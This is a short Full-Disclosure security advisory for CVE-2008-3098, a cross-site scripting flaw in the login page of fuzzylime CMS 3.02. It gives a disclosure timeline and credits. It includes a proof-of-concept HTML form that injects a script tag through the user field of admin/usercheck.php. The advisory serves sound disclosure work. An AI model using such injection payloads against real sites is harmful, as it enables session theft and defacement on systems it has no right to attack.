Cross Site Scripting (XSS) Vulnerabilitiy in fuzzylime (cms) >=3.02, CVE-2008-3098
References http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3098 http://cms.fuzzylime.co.uk Description Fuzzylime (cms) is a way to run websites and keep it up-to-date. Once installed, you can update from any internet-connected PC in the world - you don't even need to know HTML! It has tons of features so whatever you want from your site, chances are this script will be able to do it for you. Example Assuming Fuzzylime is installed on http://localhost/fuzzylime/, anybody could inject JavaScript: <form method="post" action="http://localhost/fuzzylime/admin/usercheck.php"> <input type="hidden" name="log" value="in"> <input type="text" name="user"value='"><script>alert(1)</script>'> <input type=submit></form> Disclosure Timeline 2008-09-10 Vendor contacted 2008-09-20 Vendor released 3.03 2008-09-22 Advisory published CVE Information The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2008-3098 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. Credits and copyright This vulnerability was discovered by Fabian Fingerle (published with help from Hanno Boeck). It's licensed under the creative commons attribution license. Fabian Fingerle, 2008-09-22, http://www.fabian-fingerle.de _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/